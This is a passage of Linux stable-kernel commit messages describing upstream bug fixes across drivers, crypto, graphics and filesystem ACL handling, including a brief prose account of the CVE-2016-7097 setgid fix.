clock) to different frequencies during over-temp/under-voltage,
without notification to Linux.
On my system, this moves the Linux-enabled HDMI state machine and DSI1
escape clock over to plld_per from pllc_per. EMMC still ends up on
pllc_per, because the firmware had set it up to use that.
Signed-off-by: Eric Anholt <eric@anholt.net>
Fixes: 41691b8862 ("clk: bcm2835: Add support for programming the audio domain clocks")
Acked-by: Martin Sperl <kernel@martin.sperl.org>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6cd997db91 upstream.
con3270 contains an optimisation that reduces the amount of data to be
transmitted to the 3270 terminal by putting a Repeat to Address (RA)
order into the data stream. The RA order itself takes up space, so
con3270 only uses it if there's enough space left in the line
buffer. Otherwise it just pads out the line manually.
For lines that were _just_ short enough that the RA order still fit in
the line buffer, the line was instead padded with an insufficient
amount of spaces. This was caused by examining the size of the
allocated line buffer rather than the length of the string to be
displayed.
For con3270_cline_end(), we just compare against the line length. For
con3270_update_string() however that isn't available anymore, so we
check whether the Repeat to Address order is present.
Fixes: f51320a5 ("[PATCH] s390: new 3270 driver.") (tglx/history.git)
Tested-by: Jing Liu <liujbjl@linux.vnet.ibm.com>
Tested-by: Yang Chen <bjcyang@linux.vnet.ibm.com>
Signed-off-by: Sascha Silbe <silbe@linux.vnet.ibm.com>
Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c14f2aac7a upstream.
con3270 contains an optimisation that reduces the amount of data to be
transmitted to the 3270 terminal by putting a Repeat to Address (RA)
order into the data stream. The RA order itself takes up space, so
con3270 only uses it if there's enough space left in the line
buffer. Otherwise it just pads out the line manually.
For lines too long to include the RA order, one byte was left
uninitialised. This was caused by an off-by-one bug in the loop that
pads out the line. Since the buffer is allocated from a common pool,
the single byte left uninitialised contained some previous buffer
content. Usually this was just a space or some character (which can
result in clutter but is otherwise harmless). Sometimes, however, it
was a Repeat to Address order, messing up the entire screen layout and
causing the display to send the entire buffer content on every
keystroke.
Fixes: f51320a5 ("[PATCH] s390: new 3270 driver.") (tglx/history.git)
Reported-by: Liu Jing <liujbjl@linux.vnet.ibm.com>
Tested-by: Jing Liu <liujbjl@linux.vnet.ibm.com>
Tested-by: Yang Chen <bjcyang@linux.vnet.ibm.com>
Signed-off-by: Sascha Silbe <silbe@linux.vnet.ibm.com>
Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d53c51f261 upstream.
Since commit 9f3d6d7, chsc_get_channel_measurement_chars is called with
interrupts disabled during resume from hibernate. Because this function
used spin_unlock_irq, interrupts were accidentally enabled. Fix
this by using the irqsave variant.
Since we can't guarantee the IRQ-enablement state for all (future/
external) callers, change the locking in related functions to prevent
similar bugs in the future.
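The irqsave pattern, for reference (a generic sketch, lock name illustrative, not the exact cio code):

    unsigned long flags;

    spin_lock_irqsave(&private->lock, flags);
    /* build and issue the CHSC request, copy out the measurement data */
    spin_unlock_irqrestore(&private->lock, flags);

Unlike spin_unlock_irq(), the restore variant puts the interrupt state back to whatever it was on entry, so callers that already run with interrupts disabled stay that way.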
Fixes: 9f3d6d7 ("s390/cio: update measurement characteristics")
Signed-off-by: Sebastian Ott <sebott@linux.vnet.ibm.com>
Reviewed-by: Peter Oberparleiter <oberpar@linux.vnet.ibm.com>
Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a19440304d upstream.
When a view destruction command was present in the command stream, the
view was validated to avoid a device error. That caused excessive and
unnecessary validations of views, surfaces and mobs on view destruction.
Replace this with a new relocation type that patches the view
destruction command to a NOP if the view is not present in the device
after the execbuf validation sequence.
Also add checks for the member size of the vmw_res_relocation struct.
Fixes sporadic command submission errors on google-earth exit.
Reported-by: Brian Paul <brianp@vmware.com>
Signed-off-by: Thomas Hellstrom <thellstrom@vmware.com>
Reviewed-by: Brian Paul <brianp@vmware.com>
Reviewed-by: Sinclair Yeh <syeh@vmware.com>
Signed-off-by: Sinclair Yeh <syeh@vmware.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 86c7e68364 upstream.
A workaround for a warning introduced a use of the NO_IRQ
macro that should have been gone for a long time.
It is clear from the code that the value cannot actually
be used, but apparently there was a configuration at
some point that caused a warning, so instead of just
reverting that patch, this rearranges the code in a way that
the warning cannot reappear.
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Fixes: 6ef41cf6f7 ("dmaengine :ipu: change ipu_irq_handler() to remove compile warning")
Signed-off-by: Vinod Koul <vinod.koul@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0610735928 upstream.
bq->charger is initialized in bq24257_power_supply_init.
Therefore, bq24257_power_supply_init should be called before the
registration of the IRQ handler bq24257_irq_handler_thread that calls
power_supply_changed(bq->charger).
Signed-off-by: Georges Savoundararadj <savoundg@gmail.com>
Cc: Aurelien Chanot <chanot.a@gmail.com>
Cc: Andreas Dannenberg <dannenberg@ti.com>
Cc: Sebastian Reichel <sre@kernel.org>
Cc: David Woodhouse <dwmw2@infradead.org>
Fixes: 2219a93596 ("power_supply: Add TI BQ24257 charger driver")
Signed-off-by: Sebastian Reichel <sre@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 84b3adc243 upstream.
There is no need to have a global qpt_mask as that does not support the
multiple chip model which qib has. Instead rely on the value which
exists already in the device data (dd).
Fixes: 898fa52b4a ("IB/qib: Remove qpn, qp tables and related variables from qib")
Reviewed-by: Mike Marciniszyn <mike.marciniszyn@intel.com>
Signed-off-by: Dennis Dalessandro <dennis.dalessandro@intel.com>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9afe11e956 upstream.
Private functions in ks_hostif.c can be declared static.
Fixes: 13a9930d15 ("staging: ks7010: add driver from Nanonote extra-repository")
Signed-off-by: Nicholas Mc Guire <hofrat@osadl.org>
Reviewed-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9d29f14db1 upstream.
wait_for_completion_interruptible_timeout() returns 0 on timeout and
-ERESTARTSYS if interrupted. The check for
!wait_for_completion_interruptible_timeout() would report an interrupt
as a timeout. Further, while HZ/50 will work most of the time, it could
fail for HZ < 50, so this is switched to msecs_to_jiffies(20).
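The corrected pattern looks roughly like this (sketch; the completion and return variables are illustrative):

    long rc;

    rc = wait_for_completion_interruptible_timeout(&priv->confirm_wait,
                                                   msecs_to_jiffies(20));
    if (rc == 0)            /* timed out */
        ret = -ETIMEDOUT;
    else if (rc < 0)        /* interrupted: rc == -ERESTARTSYS */
        ret = rc;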
Fixes: 13a9930d15 ("staging: ks7010: add driver from Nanonote extra-repository")
Signed-off-by: Nicholas Mc Guire <hofrat@osadl.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1335a9516d upstream.
Commit fadbe0cd52 ("staging: rtl8188eu:
Remove rtw_zmalloc(), wrapper for kzalloc()") changed all allocation
calls to be GFP_KERNEL even though the original wrapper was testing
to determine if the caller was in atomic mode. Most of the mistakes
were corrected with commit 33dc85c3c6
("staging: r8188eu: Fix scheduling while atomic error introduced in
commit fadbe0cd"); however, two kzalloc calls were missed as the
call only happens when the driver is shutting down.
Fixes: fadbe0cd52 ("staging: rtl8188eu: Remove rtw_zmalloc(), wrapper for kzalloc()")
Signed-off-by: Larry Finger <Larry.Finger@lwfinger.net>
Cc: navin patidar <navin.patidar@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 992f961480 upstream.
Commit 6fba39cf32 ("staging: sm750fb: use BIT macro for
PANEL_DISPLAY_CTRL single-bit fields") accidentally changed the
CLOCK_PHASE logic from '|=' to '=' which clears all the previously set
bits.
Fixes: 6fba39cf32 ("staging: sm750fb: use BIT macro for PANEL_DISPLAY_CTRL single-bit fields")
Signed-off-by: Phil Turnbull <phil.turnbull@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4a236d01b5 upstream.
The newly added Hi6220 Ion code fails to build when the ION_OF helpers
are not present:
drivers/staging/android/ion/hisilicon/hi6220_ion.o: In function `hi6220_ion_remove':
hi6220_ion.c:(.text.hi6220_ion_remove+0x4c): undefined reference to `ion_destroy_platform_data'
drivers/staging/android/ion/hisilicon/hi6220_ion.o: In function `hi6220_ion_probe':
hi6220_ion.c:(.text.hi6220_ion_probe+0x5c): undefined reference to `ion_parse_dt'
hi6220_ion.c:(.text.hi6220_ion_probe+0xf8): undefined reference to `ion_destroy_platform_data'
This selects the symbol when needed.
Fixes: 2b40182a19 ("staging: android: ion: Add ion driver for Hi6220 SoC platform")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Laura Abbott <labbott@redhat.com>
Reviewed-by: Sumit Semwal <sumit.semwal@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9d47964bfd upstream.
The comparison for the devnr limit is off by one: the current check
allows 0 to AD5755_NUM_CHANNELS, while the limit should in fact be
0 to AD5755_NUM_CHANNELS - 1. This can lead to an out-of-bounds
write to pdata->dac[devnr]. Fix this by replacing > with >= in the
comparison.
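The bounds check therefore becomes (sketch, error handling illustrative):

    if (devnr >= AD5755_NUM_CHANNELS) {    /* was '>', which let devnr index
                                              one element past pdata->dac[] */
        dev_err(dev, "invalid DAC channel index %u\n", devnr);
        return NULL;
    }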
Signed-off-by: Colin Ian King <colin.king@canonical.com>
Fixes: c947459979 ("iio: ad5755: add support for dt bindings")
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a3930ed060 upstream.
Commit d88429a695 ("ASoC: dapm: Add output driver widget") added
the snd_soc_dapm_out_drv ID for the output driver widget, which is
the same as the PGA widget, with a later power sequence number.
Commit 19a2557b76 ("ASoC: dapm: Add kcontrol support for PGAs")
then added kcontrol support for PGA widgets, but failed to account
for output driver widgets. Attempts to use kcontrols with output
driver widgets result in silent failures, with the developer having
little idea about what went on.
Add snd_soc_dapm_out_drv to the switch/case block under snd_soc_dapm_pga
in dapm_create_or_share_kcontrol, since they are essentially the same.
Fixes: 19a2557b76 ("ASoC: dapm: Add kcontrol support for PGAs")
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 071133a209 upstream.
The value for the second channel in _ENUM_DOUBLE (double channel) MUXs
is not correctly updated, due to using the wrong bit shift.
Use the correct bit shift, so both channels toggle together.
Fixes: 3727b49684 ("ASoC: dapm: Consolidate MUXs and value MUXs")
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Reviewed-by: Charles Keepax <ckeepax@opensource.wolfsonmicro.com>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 01ad5e7de6 upstream.
If soc_dapm_read() fails, val will be uninitialized, and bogus values
will be written later:
ret = soc_dapm_read(dapm, reg, &val);
val = (val >> shift) & mask;
However, the compiler does not give a warning. Return on error before
val is really used to avoid this.
This is similar to the commit 6912831623 ("ASoC: dapm: Fix
uninitialized variable in snd_soc_dapm_get_enum_double()")
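In other words, the read result is checked before val is consumed (sketch):

    ret = soc_dapm_read(dapm, reg, &val);
    if (ret) {
        dev_err(dapm->dev, "ASoC: read of register %x failed: %d\n", reg, ret);
        return ret;     /* never use the uninitialized val */
    }
    val = (val >> shift) & mask;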
Fixes: ce0fc93ae5 ("ASoC: Add DAPM support at the component level")
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8ae3ea48df upstream.
Fix to return error code -ENOMEM instead of 0 when failed to create
widget, as done elsewhere in this function.
Fixes: 8a9782346d ("ASoC: topology: Add topology core")
Signed-off-by: Wei Yongjun <weiyj.lk@gmail.com>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ad8529fde9 upstream.
Currently omap-rng checks the return value of pm_runtime_get_sync and
reports failure if anything non-zero is returned. However, it should check
whether ret < 0, as pm_runtime_get_sync returns 0 on success but can also
return 1 if the device was already active, which is not a failure case.
Only values < 0 are actual failures.
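The probe-time check therefore becomes something like (sketch):

    ret = pm_runtime_get_sync(&pdev->dev);
    if (ret < 0) {      /* a return of 1 means 'already active', not an error */
        dev_err(&pdev->dev, "failed to runtime_get device: %d\n", ret);
        pm_runtime_put_noidle(&pdev->dev);
        return ret;
    }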
Fixes: 61dc0a446e ("hwrng: omap - Fix assumption that runtime_get_sync will always succeed")
Signed-off-by: Dave Gerlach <d-gerlach@ti.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ed4767d612 upstream.
Since commit 8996eafdcb ("crypto: ahash - ensure statesize is non-zero"),
all ahash drivers are required to implement import()/export(), and must have
a non-zero statesize. Fix this for the ARM Crypto Extensions GHASH
implementation.
Fixes: 8996eafdcb ("crypto: ahash - ensure statesize is non-zero")
Signed-off-by: Ard Biesheuvel <ard.biesheuvel@linaro.org>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 09951d83fc upstream.
So far, part of mv_cesa_int was responsible for dequeuing completed
requests, then calling the 'cleanup' operation on these reqs and calling the
crypto API callback 'complete'. The problem is that the transformation
context 'ctx' is retrieved only once, before the while loop. This means
that the wrong 'cleanup' operation might be called on the wrong type of
cesa request, which can lead to memory corruption with this message:
marvell-cesa f1090000.crypto: dma_pool_free cesa_padding, 5a5a5a5a/5a5a5a5a (bad dma)
This commit fixes the issue, by updating the transformation context for
each dequeued cesa request.
Fixes: commit 85030c5168 ("crypto: marvell - Add support for chai...")
Signed-off-by: Romain Perier <romain.perier@free-electrons.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 50d2e6dc1f upstream.
The cipher block size for GCM is 16 bytes, and thus the CTR transform
used in crypto_gcm_setkey() will also expect a 16-byte IV. However,
the code currently reserves only 8 bytes for the IV, causing
an out-of-bounds access in the CTR transform. This patch fixes
the issue by setting the size of the IV buffer to 16 bytes.
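A sketch of the shape of the change in crypto_gcm_setkey(); surrounding members are omitted and field names are illustrative:

    struct {
        be128 hash;
        u8 iv[16];      /* IV size of the underlying CTR transform:
                           16 bytes for CTR(AES), not 8 */
        /* remaining members unchanged */
    } *data;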
Fixes: 84c9115230 ("[CRYPTO] gcm: Add support for async ciphers")
Signed-off-by: Ondrej Mosnacek <omosnacek@gmail.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 57cfda1ac7 upstream.
Currently, in mv_cesa_{md5,sha1,sha256}_init creq->state is initialized
before the call to mv_cesa_ahash_init. This is wrong because that
function fills creq with zeroes using memset, so its 'state' field, which
contains the default DIGEST, is overwritten. This commit fixes the issue
by initializing creq->state just after the call to mv_cesa_ahash_init.
Fixes: commit b0ef51067c ("crypto: marvell/cesa - initialize hash...")
Signed-off-by: Romain Perier <romain.perier@free-electrons.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 18f53fe0f3 upstream.
Commit 7a0adc83f3 ("ath10k: improve tx scheduling") causes a
severe throughput drop in multi-client mode. This issue was originally
reported on a Veriwave setup with 50 clients running TCP downlink traffic.
As the number of clients increases, the average throughput drops
gradually. With 50 clients, the combined peak throughput decreased
to 98 Mbps, whereas reverting the given commit restored it to 550 Mbps.
Processing txqs on every tx completion causes overhead. Ideally, for
management frame tx completions, processing of pending txqs can be avoided.
The change partly reverts the commit "ath10k: improve tx scheduling".
Processing pending txqs after all skb tx completions yields enough
room to burst tx frames.
Fixes: 7a0adc83f3 ("ath10k: improve tx scheduling")
Signed-off-by: Rajkumar Manoharan <rmanohar@qti.qualcomm.com>
Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 77eb3d6931 upstream.
When the user requests survey dump data, the driver provides wrong survey
information: the information sent is the survey data that was
collected during the previous user request.
This issue occurs because we request the survey dump for the wrong channel.
With this change, we display the correct and current survey
information to userspace.
Fixes: fa7937e3d5 ("ath10k: update bss channel survey information")
Signed-off-by: Ashok Raj Nagarajan <arnagara@qti.qualcomm.com>
Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e4fd726f21 upstream.
In the wake tx queue path, we are not checking whether the frame to be sent
takes the management path or not. For example, a QoS null func frame coming
here will take the management path. Since we are not incrementing the
descriptor counter (num_pending_mgmt_tx) for management tx, it is possible
to see negative values on tx completion.
When the above counter reaches a negative value, we will not be sending a
probe response out.
if (is_presp &&
ar->hw_params.max_probe_resp_desc_thres < htt->num_pending_mgmt_tx)
For IPQ4019, max_probe_resp_desc_thres (u32), which is 24, is compared
against num_pending_mgmt_tx (int); the above condition comes true when the
counter is negative, and we drop the probe response.
To avoid this, also check the tx path of the frame in the wake tx queue
path and increment the appropriate counters.
Fixes: cac085524c ("ath10k: move mgmt descriptor limit handle under mgmt_tx")
Signed-off-by: Ashok Raj Nagarajan <arnagara@qti.qualcomm.com>
Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 64ed5771ac upstream.
The WMI_SERVICE_PERIODIC_CHAN_STAT_SUPPORT service was missed in
commit 7e247a9e88 ("ath10k: add dynamic tx mode switch
config support for qca4019"). This patch adds the service to
avoid a mismatch between host and target.
Fixes: 7e247a9e88 ("ath10k: add dynamic tx mode switch config support for qca4019")
Signed-off-by: Tamizh chelvam <c_traja@qti.qualcomm.com>
Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c8ccf3ade7 upstream.
Recent patch "mwifiex: fix NULL pointer" skips extended scan event
handling when suspend is in progress. It created a problem for scan
after interface disabled/enabled case.
This patch solves the problem by checking netif_running() status.
Fixes:16d25da94f3d654 ("mwifiex: fix NULL pointer dereference during suspend")
Signed-off-by: Amitkumar Karwar <akarwar@marvell.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b64db1b252 upstream.
The AID gets updated during TDLS setup, but the modified value isn't
reflected in "priv->assoc_rsp_buf". This causes TDLS setup failure. The
problem is
fixed here.
Fixes: 4aff53ef18 ("mwifiex: parsing aid while receiving..")
Signed-off-by: Xinming Hu <huxm@marvell.com>
Signed-off-by: Amitkumar Karwar <akarwar@marvell.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6999aeabbb upstream.
The call sequence spi_alloc_master/spi_register_master/spi_unregister_master
is complete; it reduces the device reference count to zero, which results
in the device memory being freed. The subsequent call to spi_master_put is
unnecessary and results in an access to freed memory. Drop it.
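For reference, the remove path should stop at the unregister call (a sketch of the relevant part, not the full remove function):

    static int dspi_remove(struct platform_device *pdev)
    {
        struct spi_master *master = platform_get_drvdata(pdev);

        /* drops the last reference and frees the underlying device */
        spi_unregister_master(master);
        /* no spi_master_put(master) here: it would touch freed memory */
        return 0;
    }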
Fixes: 9298bc7273 ("spi: spi-fsl-dspi: Remove spi-bitbang")
Signed-off-by: Wei Yongjun <weiyj.lk@gmail.com>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4d31a2588a upstream.
The variable i contains the total number of resources (including
IORESOURCE_IRQ). However, we want dmem_region_start to point
just after the last resource of type IORESOURCE_MEM. The original behaviour
(very likely) leads to skipping several UIO mapping regions and makes
them useless. Fix this by computing dmem_region_start from uiomem,
which points to the last used UIO mapping.
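Since uiomem walks forward over uioinfo->mem[] while the IORESOURCE_MEM entries are filled in, the start index falls out of simple pointer arithmetic (sketch):

    /* uiomem now points one past the last static mapping in use, so its
     * distance from the start of the array is the number of static
     * mappings, i.e. the index of the first dynamic region. */
    priv->dmem_region_start = uiomem - &uioinfo->mem[0];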
Fixes: 0a0c3b5a24 ("Add new uio device for dynamic memory allocation")
Signed-off-by: Jan Viktorin <viktorin@rehivetech.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 481e46fe7a upstream.
commit de5461970b ("coresight: tmc: allocating memory when needed")
removed the static allocation of the buffer for the trace data in ETR mode
in tmc_probe. However, it failed to remove the dma_free_coherent() call in
tmc_probe when the probe fails due to other reasons. This patch gets
rid of the incorrect dma_free_coherent() call.
Fixes: commit de5461970b ("coresight: tmc: allocating memory when needed")
Cc: Mathieu Poirier <mathieu.poirier@linaro.org>
Signed-off-by: Suzuki K Poulose <suzuki.poulose@arm.com>
Signed-off-by: Mathieu Poirier <mathieu.poirier@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ee26c013cd upstream.
Without this patch irq_domain_disassociate() cannot properly release the
interrupt. In fact, irq_map_generic_chip() checks a bit on 'gc->installed'
but said bit is never cleared, only set.
Commit 088f40b7b0 ("genirq: Generic chip: Add linear irq domain support")
added the irq_map_generic_chip() function and also stated "This lacks a removal
function for now".
This commit provides an implementation of an unmap function that can be
called by irq_domain_disassociate().
[ tglx: Made the function static and removed the export as we have neither
a prototype nor a modular user. ]
Fixes: 088f40b7b0 ("genirq: Generic chip: Add linear irq domain support")
Signed-off-by: Sebastian Frias <sf84@laposte.net>
Cc: Marc Zyngier <marc.zyngier@arm.com>
Cc: Mason <slash.tmp@free.fr>
Cc: Jason Cooper <jason@lakedaemon.net>
Link: http://lkml.kernel.org/r/579F5C5A.2070507@laposte.net
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit babf985d1e upstream.
Commit 704c4b0ddc ("cxlflash: Shutdown notify support for CXL Flash
cards") was recently introduced to notify the AFU when a system is going
down. Due to the position of the cxlflash driver in the device stack,
cxlflash devices are _always_ removed during a reboot/shutdown. This can
lead to a crash if the cxlflash shutdown hook is invoked _after_ the
shutdown hook for the owning virtual PHB. Furthermore, the current
implementation of shutdown/remove hooks for cxlflash are not tolerant to
being invoked when the device is not enabled. This can also lead to a
crash in situations where the remove hook is invoked after the device
has been removed via the vPHBs shutdown hook. An example of this
scenario would be an EEH reset failure while a reboot/shutdown is in
progress.
To solve both problems, the shutdown hook for cxlflash is updated to
simply remove the device. This path already includes the AFU
notification and thus this solution will continue to perform the
original intent. At the same time, the remove hook is updated to protect
against being called when the device is not enabled.
Fixes: 704c4b0ddc ("cxlflash: Shutdown notify support for CXL Flash
cards")
Signed-off-by: Uma Krishnan <ukrishn@linux.vnet.ibm.com>
Acked-by: Matthew R. Ochs <mrochs@linux.vnet.ibm.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 410280bac6 upstream.
We know that 'retval = 0' because it has been tested a few lines above.
So, if 'devm_kmalloc' fails, 0 will be returned instead of an error code.
Return -ENOMEM instead.
Fixes: 8b4c000931 ("rt2x00usb: Use usb anchor to manage URB")
Signed-off-by: Christophe JAILLET <christophe.jaillet@wanadoo.fr>
Acked-by: Stanislaw Gruszka <sgruszka@redhat.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 073931017b upstream.
When file permissions are modified via chmod(2) and the user is not in
the owning group or capable of CAP_FSETID, the setgid bit is cleared in
inode_change_ok(). Setting a POSIX ACL via setxattr(2) sets the file
permissions as well as the new ACL, but doesn't clear the setgid bit in
a similar way; this allows the chmod(2) check to be bypassed. Fix that.
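The rule being enforced is the same one chmod(2) applies; roughly (a
simplified sketch, not the exact helper that was merged, which also honours
user namespaces):

    /* When the ACL update also changes the file mode, drop the setgid bit
     * unless the caller is in the owning group or has CAP_FSETID. */
    if ((mode & S_ISGID) &&
        !in_group_p(inode->i_gid) &&
        !capable(CAP_FSETID))
            mode &= ~S_ISGID;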
References: CVE-2016-7097
Reviewed-by: Christoph Hellwig <hch@lst.de>
Reviewed-by: Jeff Layton <jlayton@redhat.com>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
Signed-off-by: Juerg Haefliger <juerg.haefliger@hpe.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a3fd4c67af upstream.
DPLL_SDVO_HIGH_SPEED must be set for SDVO/HDMI/DP, but nowhere is it
forbidden to set it for LVDS/CRT as well. So let's also set it on
CRT to make it possible to share the DPLL between HDMI and CRT.
What that bit apparently does is enable the x5 clock to the port,
which then pumps out the bits on both edges of the clock. The DAC
doesn't need that clock since it's not pumping out bits, but I don't
think it hurts to have the DPLL output that clock anyway.
This is fairly important on IVB since it has only two DPLLs with three
pipes. So trying to drive three or more PCH ports with three pipes
is only possible when at least one of the DPLLs gets shared between
two of the pipes.
SNB doesn't really need to do this since it has only two pipes. It could
be done to avoid enabling the second DPLL at all in certain cases, but
I'm not sure that's such a huge win. So let's not do it for SNB, at
least for now. On ILK it never makes sense as the DPLLs can't be shared.
v2: Just always enable the high speed clock to keep things simple (Daniel)
Beef up the commit message a bit (Daniel)
Cc: Nick Yamane <nick.diego@gmail.com>
Cc: Daniel Vetter <daniel.vetter@ffwll.ch>
Tested-by: Nick Yamane <nick.diego@gmail.com>
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=97204
Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1474878646-17711-1-git-send-email-ville.syrjala@linux.intel.com
Reviewed-by: Ander Conselvan de Oliveira <conselvan2@gmail.com>
(cherry picked from commit 7d7f8633a8)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cf6c525a31 upstream.
The confusing thing is that plane_blocks_per_line is listed as part of
the method 2 calculation but is also used for other things. We
calculated it in two different places and different ways: one inside
skl_wm_method2() and the other inside skl_compute_plane_wm(). The
skl_wm_method2() implementation is the one that matches the
specification.
With this patch we fix the skl_compute_plane_wm() calculation and just
pass it as a parameter to skl_wm_method2(). We also take care to not
modify the value of plane_bytes_per_line since we're going to rely on
it having a correct value in later patches.
This should affect the watermarks for Linear and Y-tiled.
From my analysis, it looks like the two plane_blocks_per_line
variables got out of sync on 0fda65680e, but we can't really say
that commit was a regression; it looks like just an incomplete fix.
There's always the possibility that 0fda65680e matched our
specification at that time, and then later the specification changed.
v2: Try to add a "Fixes" tag (Maarten).
Fixes: 0fda65680e ("drm/i915/skl: Update watermarks for Y tiling")
Cc: Tvrtko Ursulin <tvrtko.ursulin@intel.com>
Reviewed-by: Lyude <cpaul@redhat.com>
Reviewed-by: Maarten Lankhorst <maarten.lankhorst@linux.intel.com>
Signed-off-by: Paulo Zanoni <paulo.r.zanoni@intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1474578035-424-7-git-send-email-paulo.r.zanoni@intel.com
(cherry picked from commit 7a1a8aed67)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit be5c571b2f upstream.
We were previously adding all the planes owned by the CRTC even when
the ddb partitioning didn't change for them. As a consequence, a lot
of functions were being called when we were just moving the cursor
around the screen, such as skylake_update_primary_plane().
This was causing flickering on the primary plane when moving the
cursor. I'm not 100% sure which operation caused the flickering, but
we were writing to a lot of registers, so it could be any of these
writes. With this patch, just moving the mouse won't add the primary
plane to the commit since it won't trigger a change in DDB
partitioning.
v2: Use skl_ddb_entry_equal() (Lyude).
v3: Change Reported-and-bisected-by: to Reported-by: for checkpatch
Fixes: 05a76d3d6a ("drm/i915/skl: Ensure pipes with changed wms get added to the state")
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=97888
Cc: Mike Lothian <mike@fireburn.co.uk>
Reported-by: Mike Lothian <mike@fireburn.co.uk>
Signed-off-by: Paulo Zanoni <paulo.r.zanoni@intel.com>
Signed-off-by: Lyude <cpaul@redhat.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1475177808-29955-1-git-send-email-paulo.r.zanoni@intel.com
(cherry picked from commit 7f60e200e2)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ccebc23b57 upstream.
i915 sometimes needs to disable planes in the middle of an atomic
commit, and then reenable them later in the same commit. Because of
this, we can't make the assumption that the state of the plane actually
changed. Since the state of the plane hasn't actually changed, neither
have its watermarks. And if the watermarks haven't changed, then we
haven't populated skl_results with anything, which means we'll end up
